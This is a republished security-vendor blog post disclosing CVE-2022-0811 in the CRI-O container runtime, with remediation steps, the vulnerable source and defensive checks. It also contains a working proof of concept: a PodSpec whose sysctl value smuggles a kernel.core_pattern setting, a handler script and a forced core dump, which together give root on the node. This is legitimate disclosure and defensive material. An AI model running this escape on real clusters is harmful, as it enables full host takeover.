cr8escape: New Vulnerability in CRI-O Container Engine Discovered by CrowdStrike (CVE-2022-0811)

Published 06/03/2022

This blog was originally published by CrowdStrike on March 15, 2022.

Written by John Walker and Manoj Ahuje, CrowdStrike.

CrowdStrike cloud security researchers discovered a new vulnerability (dubbed “cr8escape” and tracked as CVE-2022-0811) in the Kubernetes container engine CRI-O.
CrowdStrike disclosed the vulnerability to Kubernetes, which worked with CRI-O to issue a patch that was released on March 15, 2022.
It is recommended that CRI-O users patch immediately.

Summary

CrowdStrike’s Cloud Threat Research team discovered a new vulnerability (CVE-2022-0811) in CRI-O (a container runtime engine underpinning Kubernetes). Dubbed “cr8escape,” it could allow an attacker to escape from a Kubernetes container, gain root access to the host and move anywhere in the cluster. Exploiting CVE-2022-0811 can allow an attacker to perform a variety of actions on objectives, including execution of malware, exfiltration of data and lateral movement across pods.

CrowdStrike disclosed the vulnerability to Kubernetes, which worked with CRI-O to issue a patch that was released on March 15, 2022. The CVE score is 8.8 (High), and the potential impact is widespread, as many software packages and platforms use CRI-O by default. It is recommended that CRI-O users patch immediately.

Kubernetes uses a container runtime like CRI-O or Docker to safely share each node’s kernel and resources with the various containerized applications running on it. The Linux kernel accepts runtime parameters that control its behavior. Some parameters are namespaced and can therefore be set in a single container without impacting the system at large. Kubernetes and the container runtimes it drives allow pods to update these “safe” kernel settings while blocking access to others.

CrowdStrike’s Cloud Threat Research team discovered a flaw introduced in CRI-O version 1.19 that allows an attacker to bypass these safeguards and set arbitrary kernel parameters on the host. As a result of CVE-2022-0811, anyone with rights to deploy a pod on a Kubernetes cluster that uses the CRI-O runtime can abuse the “kernel.core_pattern” parameter to achieve container escape and arbitrary code execution as root on any node in the cluster.
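To make the weakness concrete, here is a minimal Go sketch of an allowlist that looks only at a sysctl's name. The two-entry `safeSysctls` map and the `allowedByName` helper are hypothetical illustrations, not Kubernetes or CRI-O code; the point is simply that a check keyed on the name alone will accept any value, including one that carries a second setting.

```go
package main

import "fmt"

// safeSysctls is an illustrative subset of sysctls treated as "safe"
// (namespaced). It is NOT the authoritative Kubernetes list.
var safeSysctls = map[string]bool{
	"kernel.shm_rmid_forced":       true,
	"net.ipv4.ip_local_port_range": true,
}

// allowedByName approves a sysctl purely on its name.
// The value is deliberately ignored: that is the weakness being illustrated.
func allowedByName(name, value string) bool {
	return safeSysctls[name]
}

func main() {
	// A value that smuggles a second key=value pair past the name check.
	smuggled := "1+kernel.core_pattern=|/path/to/handler #"
	fmt.Println(allowedByName("kernel.shm_rmid_forced", smuggled))         // true
	fmt.Println(allowedByName("kernel.core_pattern", "|/path/to/handler")) // false
}
```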

Impact

Directly Affected Software

CRI-O version 1.19+

To determine whether a host is affected, run crio --version and check whether the reported version is 1.19 or later.
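If you are checking many hosts, the comparison can be scripted. The Go sketch below assumes you have already extracted a bare version number such as "1.22.0" from the crio --version output (the surrounding output format varies between releases, so parsing it is left out). The helper name `inAffectedSeries` is hypothetical, and it only tests for the 1.19+ series named above: it does not know which point releases carry the fix, so a `true` result means "check further", not "confirmed vulnerable".

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// inAffectedSeries reports whether a version string such as "1.22.0"
// is 1.19 or later. Patched point releases are NOT taken into account.
func inAffectedSeries(version string) (bool, error) {
	v := strings.TrimPrefix(strings.TrimSpace(version), "v")
	parts := strings.Split(v, ".")
	if len(parts) < 2 {
		return false, fmt.Errorf("unexpected version format: %q", version)
	}
	major, err := strconv.Atoi(parts[0])
	if err != nil {
		return false, err
	}
	minor, err := strconv.Atoi(parts[1])
	if err != nil {
		return false, err
	}
	return major > 1 || (major == 1 && minor >= 19), nil
}

func main() {
	for _, v := range []string{"1.18.4", "1.19.0", "1.22.0"} {
		affected, err := inAffectedSeries(v)
		if err != nil {
			fmt.Println(v, "error:", err)
			continue
		}
		fmt.Printf("%s in 1.19+ series: %v\n", v, affected)
	}
}
```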

Indirectly Affected Software and Platforms

While the vulnerability is in CRI-O, software and platforms that depend on it are also likely to be vulnerable, including:

OpenShift 4+
Oracle Container Engine for Kubernetes

Remediation

At the Kubernetes level:

Ideal: Use policies to block pods that contain sysctl settings with “+” or “=” in their value.
Less ideal alternative: Use the PodSecurityPolicy forbiddenSysctls field to block all sysctls. (All sysctls must be blocked, because the malicious setting is smuggled inside the value of an otherwise allowed sysctl.)
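The rule behind the "ideal" option is simple enough to state in a few lines. In practice it would be expressed in whatever admission controller or policy engine the cluster already runs; the Go function below is only a hypothetical sketch of the logic, and the `Sysctl` struct is a stand-in for the name/value pairs in a pod's securityContext.sysctls, not the Kubernetes API type.

```go
package main

import (
	"fmt"
	"strings"
)

// Sysctl mirrors one entry of a pod's securityContext.sysctls.
// Hypothetical stand-in, not the Kubernetes API type.
type Sysctl struct {
	Name  string
	Value string
}

// rejectSmuggledSysctls returns an error if any sysctl value contains "+"
// or "=", the characters that let a value carry extra settings to pinns.
func rejectSmuggledSysctls(sysctls []Sysctl) error {
	for _, s := range sysctls {
		if strings.ContainsAny(s.Value, "+=") {
			return fmt.Errorf("sysctl %s: value %q contains '+' or '='", s.Name, s.Value)
		}
	}
	return nil
}

func main() {
	benign := []Sysctl{{Name: "kernel.shm_rmid_forced", Value: "1"}}
	malicious := []Sysctl{{Name: "kernel.shm_rmid_forced", Value: "1+kernel.core_pattern=|/x #"}}
	fmt.Println(rejectSmuggledSysctls(benign))           // <nil>
	fmt.Println(rejectSmuggledSysctls(malicious) != nil) // true
}
```

Note that the check inspects the value, not the name: the malicious entry above uses a perfectly legitimate name.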

At the CRI-O level:

Upgrade to a patched version of CRI-O.
Set pinns_path in crio.conf to point to a pinns wrapper that strips the “-s” option before invoking the real pinns. This will prevent pods from updating any kernel parameters, including sensitive ones.
- Pinns, typically found at /usr/bin/pinns, is the utility CRI-O uses to set kernel parameters.
Downgrade to CRI-O version 1.18 or earlier. (Not recommended in most cases.)
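The pinns_path mitigation can be sketched as a small Go program. This is a hypothetical wrapper, not a CrowdStrike or CRI-O tool. It assumes the real pinns stays at /usr/bin/pinns, that the wrapper is installed somewhere else (for example /usr/local/bin/pinns-wrapper, a made-up path) and that CRI-O passes sysctls as `-s` followed by a separate argument; the attached `-sVALUE` form is dropped too, just in case. Every other argument is forwarded unchanged.

```go
// Command pinns-wrapper (hypothetical) drops the "-s" sysctl option and
// its argument, then execs the real pinns with the remaining arguments.
package main

import (
	"fmt"
	"os"
	"strings"
	"syscall"
)

// realPinns is an assumption based on the default location noted above.
const realPinns = "/usr/bin/pinns"

// stripSysctlArgs removes "-s VALUE" and the attached form "-sVALUE".
func stripSysctlArgs(args []string) []string {
	out := make([]string, 0, len(args))
	for i := 0; i < len(args); i++ {
		a := args[i]
		switch {
		case a == "-s":
			i++ // also skip the option's value
		case strings.HasPrefix(a, "-s"):
			// attached form such as "-s'kernel.x=1'": drop it
		default:
			out = append(out, a)
		}
	}
	return out
}

func main() {
	argv := append([]string{realPinns}, stripSysctlArgs(os.Args[1:])...)
	// syscall.Exec replaces this process image; it only returns on failure.
	if err := syscall.Exec(realPinns, argv, os.Environ()); err != nil {
		fmt.Fprintln(os.Stderr, "pinns-wrapper: exec failed:", err)
		os.Exit(1)
	}
}
```

Point pinns_path in crio.conf at the wrapper's location. Because syscall.Exec replaces the wrapper process rather than spawning a child, pinns runs with the same PID and environment that CRI-O set up, just without any sysctl arguments.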

Vulnerability Details

Starting with this commit, CRI-O uses the pinns utility to set kernel options for a pod. Pinns is most commonly invoked like this:
pinns -s kernel_parameter1=value1+kernel_parameter2=value2
Due to the addition of sysctl support in version 1.19, pinns will now blindly set any kernel parameters it’s passed without validation.

The following function converts the map of sysctl settings passed to CRI-O into a pinns argument. Like pinns, it does not validate the settings.

func getSysctlForPinns(sysctls map[string]string) string {
	// this assumes there's no sysctl with a `+` in it
	const pinnsSysctlDelim = "+"
	g := new(bytes.Buffer)
	for key, value := range sysctls {
		fmt.Fprintf(g, "'%s=%s'%s", key, value, pinnsSysctlDelim)
	}
	return strings.TrimSuffix(g.String(), pinnsSysctlDelim)
}
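To see what pinns actually receives, the function can be run on its own. The program below copies the logic quoted above into a standalone file and feeds it a single map entry whose value smuggles a second setting; the handler path is a placeholder.

```go
package main

import (
	"bytes"
	"fmt"
	"strings"
)

// getSysctlForPinns reproduces the CRI-O function quoted above.
func getSysctlForPinns(sysctls map[string]string) string {
	// this assumes there's no sysctl with a `+` in it
	const pinnsSysctlDelim = "+"
	g := new(bytes.Buffer)
	for key, value := range sysctls {
		fmt.Fprintf(g, "'%s=%s'%s", key, value, pinnsSysctlDelim)
	}
	return strings.TrimSuffix(g.String(), pinnsSysctlDelim)
}

func main() {
	// One "safe" key whose value carries a second setting.
	arg := getSysctlForPinns(map[string]string{
		"kernel.shm_rmid_forced": "1+kernel.core_pattern=|/path/to/malicious.sh #",
	})
	fmt.Println(arg)
	// prints: 'kernel.shm_rmid_forced=1+kernel.core_pattern=|/path/to/malicious.sh #'

	// One map entry, but two "+"-separated segments.
	fmt.Println(len(strings.Split(arg, "+"))) // 2
}
```

The single map entry comes out indistinguishable from two legitimate entries joined by the delimiter, which is exactly what the comment in the original code assumes cannot happen.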

Validation does occur before this function is invoked. However, note that the value is not checked or sanitized. As long as the sysctl key is valid, it will be processed as is.

func (s *Sysctl) Validate(hostNet, hostIPC bool) error {
	// Only the key is inspected below; the value is never checked.
	nsErrorFmt := "%q not allowed with host %s enabled"
	if ns, found := namespaces[s.Key()]; found {
		if ns == IpcNamespace && hostIPC {
			return errors.Errorf(nsErrorFmt, s.Key(), ns)
		}
		return nil
	}
	for p, ns := range prefixNamespaces {
		if strings.HasPrefix(s.Key(), p) {
			if ns == IpcNamespace && hostIPC {
				return errors.Errorf(nsErrorFmt, s.Key(), ns)
			}
			if ns == NetNamespace && hostNet {
				return errors.Errorf(nsErrorFmt, s.Key(), ns)
			}
			return nil
		}
	}
	return errors.Errorf("%s not whitelisted", s.Key())
}

As a result, a malicious user can pass in sysctl values containing + and = characters, allowing additional kernel settings to be set through pinns.

Proof of Concept: Leveraging CVE-2022-0811 to Compromise Kubernetes

Overview

This proof of concept (POC) uses a malicious PodSpec to set the kernel.core_pattern kernel parameter, which specifies how the kernel should react to a core dump. In this case, we’ll tell it to execute a binary hosted in another pod. That binary will be run as root outside of any container. Finally, we’ll trigger a core dump, causing the kernel to invoke the malicious executable.

Reproduction Environment for POC

Minikube cluster created via minikube start --kubernetes-version=v1.23.3 --driver=vmware --container-runtime=crio running:
- Kubernetes v1.23.3
- CRI-O 1.22.0 (Later versions are vulnerable as well; this just happens to be the version of CRI-O Minikube installs.)

Steps

Startup Pod to Host Malicious Executable

This pod will host an executable that the kernel will invoke after a core dump. It will also be used to trigger a core dump.

❯ cat ./malicious-script-host.yaml
apiVersion: v1
kind: Pod
metadata:
  name: malicious-script-host
spec:
  containers:
  - name: alpine
    image: alpine:latest
    command: ["tail", "-f", "/dev/null"]
 
❯ kubectl create -f ./malicious-script-host.yaml
pod/malicious-script-host created

Determine Root Path From Host Mount Namespace

Ultimately the kernel will be invoking a script in this pod in response to a core dump. The kernel will be acting in the host mount namespace, so we need to determine the path to the container filesystem from this namespace.

❯ kubectl exec -it malicious-script-host -- /bin/sh
/ # mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/containers/storage/overlay/l/VSOA5NIR3Y3ACHBH662FOSL4J2,upperdir=/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff,workdir=/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/work)
…

/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff is the path to the root of the container from the perspective of the kernel.
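Picking the path out of the mount output by eye is error-prone given how long it is. The value we want is the upperdir option of the overlay mount, which is the container's writable layer; files created inside the container, such as the script below, land there. A minimal Go sketch, assuming a single line of `mount` output in the format shown above (the helper name `upperDirFromMount` is hypothetical):

```go
package main

import (
	"fmt"
	"strings"
)

// upperDirFromMount extracts the upperdir= option from one line of `mount`
// output for an overlay filesystem. It returns "" if the option is absent.
func upperDirFromMount(line string) string {
	start := strings.Index(line, "(")
	end := strings.LastIndex(line, ")")
	if start < 0 || end <= start {
		return ""
	}
	// Options inside the parentheses are comma-separated.
	for _, opt := range strings.Split(line[start+1:end], ",") {
		if strings.HasPrefix(opt, "upperdir=") {
			return strings.TrimPrefix(opt, "upperdir=")
		}
	}
	return ""
}

func main() {
	line := "overlay on / type overlay (rw,relatime," +
		"lowerdir=/var/lib/containers/storage/overlay/l/VSOA5NIR3Y3ACHBH662FOSL4J2," +
		"upperdir=/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff," +
		"workdir=/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/work)"
	fmt.Println(upperDirFromMount(line))
}
```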

Create a Malicious Script to Invoke on Core Dump

Within our malicious script host pod:

/ # ls -l /malicious.sh
-rwxr-xr-x    1 root     root           256 Feb 23 14:00 /malicious.sh
 
/ # cat /malicious.sh
#!/bin/sh
date >> /var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/output
whoami >> /var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/output
hostname >>  /var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/output
 
# important – ensures file is readable within container
/ # touch /output 
/ # cat /output

We now have a malicious script set up, and we know its path in the host mount namespace.

Use Second Pod to Point Core Pattern to Malicious Script

Next, we attempt to create a second pod. Creation will stall, but as a result of the attempt, the CRI-O daemon will update the value of the kernel.core_pattern setting, which controls what the kernel does in response to core dumps. In this case, we’ll tell the kernel to send the core dump to our malicious script.

NOTE: You must ensure this pod runs on the same node as the malicious script pod. There are multiple ways to do this depending on the exact cluster setup. A primitive, brute-force method is to run it as a DaemonSet, which will update core_pattern on every node in the cluster.

❯ cat ./sysctl-set.yaml
apiVersion: v1
kind: Pod
metadata:
  name: sysctl-set
spec:
  securityContext:
   sysctls:
   - name: kernel.shm_rmid_forced
     value: "1+kernel.core_pattern=|/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/malicious.sh #"
  containers:
  - name: alpine
    image: alpine:latest
    command: ["tail", "-f", "/dev/null"]
 
❯ kubectl create -f ./sysctl-set.yaml
pod/sysctl-set created
 
❯ kubectl get pods
NAME                    READY   STATUS              RESTARTS   AGE
malicious-script-host   1/1     Running             0          14m
sysctl-set              0/1     ContainerCreating   0          68s
 
❯ kubectl exec -it malicious-script-host -- /bin/sh
/ # cat /proc/sys/kernel/core_pattern
|/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/malicious.sh #'

While the sysctl-set pod did not start, it successfully updated the node-wide core_pattern to point into our malicious-script-host container.

This works because both Kubernetes and CRI-O sysctl validation logic believe the user is updating only the safe kernel parameter “kernel.shm_rmid_forced.” When CRI-O actually applies this setting, though, its parser will expand it into two kernel parameter updates:

kernel.shm_rmid_forced=1
kernel.core_pattern=|<path to malicious script> #'

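This second option has not been validated or sanitized in any way. (NOTE: The trailing “ #” neutralizes the single quote CRI-O adds to the end of the value. The kernel splits a piped core_pattern on spaces, so the stray quote reaches the script as a separate argument, which the script ignores, instead of becoming part of the script path.)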
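The expansion into two settings can be modeled in a few lines of Go. This is a simplified sketch, not pinns' actual C source: it splits the argument on "+" and then splits each piece at its first "=". Stripping only a leading single quote from each key is an assumption chosen to reproduce the two settings listed above; the helper name `splitPinnsArg` is hypothetical.

```go
package main

import (
	"fmt"
	"strings"
)

// splitPinnsArg models how a "+"-delimited pinns -s argument expands into
// key/value pairs. Quote handling is an assumption, not taken from pinns.
func splitPinnsArg(arg string) [][2]string {
	var pairs [][2]string
	for _, piece := range strings.Split(arg, "+") {
		kv := strings.SplitN(piece, "=", 2)
		if len(kv) != 2 {
			continue // malformed piece; a real parser might reject it
		}
		pairs = append(pairs, [2]string{strings.TrimPrefix(kv[0], "'"), kv[1]})
	}
	return pairs
}

func main() {
	// The argument CRI-O builds from the single sysctl entry in sysctl-set.yaml
	// (script path shortened to a placeholder).
	arg := "'kernel.shm_rmid_forced=1+kernel.core_pattern=|/path/to/malicious.sh #'"
	for _, p := range splitPinnsArg(arg) {
		fmt.Printf("%s=%s\n", p[0], p[1])
	}
}
```

Run as written, it prints kernel.shm_rmid_forced=1 followed by kernel.core_pattern=|/path/to/malicious.sh #', matching the stray trailing quote visible in the core_pattern output earlier.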

Trigger Core Dump

We need to trigger a core dump to cause the kernel to execute our malicious core dump handler.

First, enable core dumps:

❯ kubectl exec -it malicious-script-host -- /bin/sh
/ # ulimit -c unlimited
/ # ulimit -c
unlimited

Now trigger one:

/ # tail -f /dev/null &
/ # ps
PID   USER     TIME  COMMAND
    1 root      0:00 tail -f /dev/null
   34 root      0:00 /bin/sh
   42 root      0:00 tail -f /dev/null
   43 root      0:00 ps
/ # kill -SIGSEGV 42
/ #
[1]+  Segmentation fault (core dumped) tail -f /dev/null

Verify Malicious Script Ran

❯ kubectl exec -it malicious-script-host -- /bin/sh
/ # cat /output
Wed Feb 23 14:20:07 UTC 2022
root
minikube

This script was invoked by the kernel outside of the container namespace with root privileges. A real attacker could, as an example, run a reverse shell and gain full control of the node.
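On the defensive side, the POC shows that the tampered core_pattern is node-wide and visible even from inside a pod. A simple check a defender might run on each node is sketched below in Go. It is a heuristic, not a CrowdStrike detection: it assumes the CRI-O storage root seen in this POC (/var/lib/containers/storage/), which may differ on other setups, and it flags only piped handlers whose executable lives under that root.

```go
package main

import (
	"fmt"
	"os"
	"strings"
)

// containerStoragePrefix is the storage root seen in this POC (an assumption).
const containerStoragePrefix = "/var/lib/containers/storage/"

// suspiciousCorePattern flags a piped core_pattern whose handler executable
// lives under container storage, i.e. inside some container's filesystem.
func suspiciousCorePattern(pattern string) bool {
	p := strings.TrimSpace(pattern)
	if !strings.HasPrefix(p, "|") {
		return false // not a pipe handler: the kernel writes a core file instead
	}
	fields := strings.Fields(strings.TrimPrefix(p, "|"))
	if len(fields) == 0 {
		return false
	}
	return strings.HasPrefix(fields[0], containerStoragePrefix)
}

func main() {
	data, err := os.ReadFile("/proc/sys/kernel/core_pattern")
	if err != nil {
		fmt.Fprintln(os.Stderr, "read core_pattern:", err)
		os.Exit(1)
	}
	value := strings.TrimSpace(string(data))
	if suspiciousCorePattern(value) {
		fmt.Println("WARNING: core_pattern pipes to a handler in container storage:", value)
	} else {
		fmt.Println("core_pattern:", value)
	}
}
```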

Notes

Kubernetes is not necessary to invoke CVE-2022-0811. An attacker on a machine with CRI-O installed can use it to set kernel parameters all by itself. We used Kubernetes in this POC to better illustrate the potential impact of the problem and to more closely simulate how this would likely be used in the wild.
